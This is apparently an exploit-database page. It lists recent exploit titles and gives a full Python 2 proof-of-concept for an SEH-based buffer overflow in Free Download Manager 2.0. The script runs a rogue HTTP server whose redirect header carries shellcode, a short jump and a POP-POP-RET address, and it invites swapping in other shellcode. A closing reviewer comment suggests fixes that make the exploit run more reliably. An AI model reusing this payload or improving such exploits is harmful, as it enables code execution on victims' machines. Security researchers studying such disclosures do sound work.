
12 changes to exploits/shellcodes Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH) Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH) Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow Shopy Point of Sale v1.0 - CSV Injection Shopy Point of Sale 1.0 - CSV Injection Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC) Blog Master Pro v1.0 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection Blog Master Pro 1.0 - CSV Injection HRSALE The Ultimate HRM 1.0.2 - CSV Injection HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting GitList 0.6 - Unauthenticated Remote Code Execution TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot Frog CMS 0.9.5 - Persistent Cross-Site Scripting
56 lines
No EOL
2.4 KiB
Python
Executable file
# Exploit Title: Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)
|
|
# Date: 2018-04-23
|
|
# Exploit Author: Marwan Shamel
|
|
# Software Link: https://filehippo.com/download_free_download_manager/925/
|
|
# Version: v2.0 Built 417
|
|
# Tested on: Windows 7 Enterprise SP1 32 bit
|
|
# Special thanks to my wife
|
|
# Steps : file > Import > Import lists of downloads > open URL file that includes http://192.168.1.53:81 (HOST|Port changed according to your needs)
|
|
|
|
#!/usr/bin/python
|
|
|
|
from socket import *
|
|
from time import sleep
|
|
|
|
host = "192.168.1.53"
|
|
port = 81
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.bind((host, port))
|
|
s.listen(1)
|
|
print "\n[+] Listening on %d ..." % port
|
|
|
|
cl, addr = s.accept()
|
|
print "[+] Connection accepted from %s" % addr[0]
|
|
|
|
nseh = "\xeb\x88\x90\x90" #Short Jump backward 118bytes (jmp short 0xffffff8a) (more bytes can be jumped backwards depending on the shell code size required )
|
|
seh = "\xd1\x9c\x4a\x00" #address to trigger POP-POP-RETURN sequence
|
|
# Evil produce a message box 113 bytes can be changed according to your needs
|
|
evil = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"
|
|
payload = "\x43" * (1724-255) + "\x90" * 142 + evil + nseh + seh
|
|
|
|
buffer = "HTTP/1.1 301 Moved Permanently\r\n"
|
|
buffer += "Date: Thu, 23 Feb 2018 10:21:08 GMT\r\n"
|
|
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
|
|
buffer += "Location: "+ payload + "\r\n"
|
|
buffer += "Vary: Accept-Encoding\r\n"
|
|
buffer += "Content-Length: 8000\r\n"
|
|
buffer += "Keep-Alive: timeout=5, max=100\r\n"
|
|
buffer += "Connection: Keep-Alive\r\n"
|
|
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
|
|
buffer += "\r\n"
|
|
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
|
|
buffer += "<html><head>\n"
|
|
buffer += "<title>301 Moved Permanently</title>\n"
|
|
buffer += "</head><body>\n"
|
|
buffer += "<h1>Moved Permanently</h1>\n"
|
|
buffer += "<p>The document has moved <ahref=\""+payload+"\">here</a>.</p>\n"
|
|
buffer += "</body></html>\n"
|
|
|
|
print cl.recv(1000)
|
|
cl.send(buffer)
|
|
print "[+] Sending buffer: OK\n"
|
|
|
|
sleep(1)
|
|
cl.close()
|
|
s.close() |
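Review bot: The script is Python 2 only (the `print "..."` statements at the listen, accept and send messages, and the str payloads passed to `cl.send`), but the `#!/usr/bin/python` shebang and the header block do not say so; on a host where `python` resolves to Python 3 it stops with a SyntaxError before binding. I would change the shebang to `#!/usr/bin/env python2` or add `# Requires Python 2 (print statements, str payload sent over the socket)` next to the "Tested on" line. The listener also binds without `SO_REUSEADDR`, so a second run shortly after the previous session closed can fail with "Address already in use"; `s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)` before `s.bind(...)` avoids that. As a point of style, `from socket import *` hides where `AF_INET`/`SOCK_STREAM` come from; `import socket` with qualified names reads more clearly.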